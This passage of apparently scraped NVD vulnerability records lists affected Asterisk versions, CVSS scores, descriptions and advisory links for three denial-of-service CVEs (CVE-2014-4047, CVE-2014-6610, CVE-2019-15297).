              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.8.x before 1.8.28.1, 11.x before 11.10.1, and 12.x before 12.3.1 and Certified Asterisk 1.8.15 before 1.8.15-cert6 and 11.6 before 11.6-cert3 allows remote attackers to cause a denial of service (connection consumption) via a large number of (1) inactive or (2) incomplete HTTP connections."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 1.8.x anterior a 1.8.28.1, 11.x anterior a 11.10.1 y 12.x anterior a 12.3.1 y Certified Asterisk 1.8.15 anterior a 1.8.15-cert6 y 11.6 anterior a 11.6-cert3 permiten a atacantes remotos causar una denegaci\u00f3n de servicio (consumo de conexi\u00f3n) a trav\u00e9s de un n\u00famero grande de conexiones HTTP (1) inactivas o (2) incompletas."
    }
  ],
  "id": "CVE-2014-4047",
  "lastModified": "2024-11-21T02:09:24.440",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-06-17T14:55:07.953",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-007.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/532415/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/127089/Asterisk-Project-Security-Advisory-AST-2014-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/532415/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-26 15:59

Modified

2024-11-21 02:14

Severity ?

Summary

Asterisk Open Source 11.x before 11.12.1 and 12.x before 12.5.1 and Certified Asterisk 11.6 before 11.6-cert6, when using the res_fax_spandsp module, allows remote authenticated users to cause a denial of service (crash) via an out of call message, which is not properly handled in the ReceiveFax dialplan application.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-010.html	Patch, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-010.html	Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F31715AF-5A35-4D0B-8E01-BB6E4CB7E02F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24F62C78-2913-463F-B689-353AB2371E3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B53364B-5278-46E9-961A-192CA334CB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 11.x before 11.12.1 and 12.x before 12.5.1 and Certified Asterisk 11.6 before 11.6-cert6, when using the res_fax_spandsp module, allows remote authenticated users to cause a denial of service (crash) via an out of call message, which is not properly handled in the ReceiveFax dialplan application."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 11.x anterior a 11.12.1 y 12.x anterior a 12.5.1 y Certified Asterisk 11.6 anterior a 11.6-cert6, cuando utilizan el m\u00f3dulo res_fax_spandsp, permiten a usuarios remotos autenticados causar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de un mensaje fuera de llamada (out of call), lo que no se maneja correctamente en la aplicaci\u00f3n ReceiveFax dialplan."
    }
  ],
  "id": "CVE-2014-6610",
  "lastModified": "2024-11-21T02:14:45.603",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-26T15:59:02.573",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-010.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-19"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-09-09 21:15

Modified

2024-11-21 04:28

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2019-004.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html	Patch, Third Party Advisory, VDB Entry
cve@mitre.org	http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Mar/5
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2019-004.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html	Patch, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Mar/5

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9A8D1D77-EF86-47B3-85FF-1FD4CFC301D8",
              "versionEndIncluding": "15.7.3",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "465E0365-BCFD-4444-A046-D0BD45E40309",
              "versionEndIncluding": "16.5.0",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference."
    },
    {
      "lang": "es",
      "value": "res_pjsip_t38 en Sangoma Asterisk 15.x antes de 15.7.4 y 16.x antes de 16.5.1 permite a un atacante desencadenar un fallo enviando un flujo rechazado en una respuesta a una reinvitaci\u00f3n T.38 iniciada por Asterisk. El fallo se produce debido a una derivaci\u00f3n de objeto de medios de sesi\u00f3n NULL."
    }
  ],
  "id": "CVE-2019-15297",
  "lastModified": "2024-11-21T04:28:24.290",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-09-09T21:15:10.827",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-004.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2021/Mar/5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2021/Mar/5"
    }
  ],
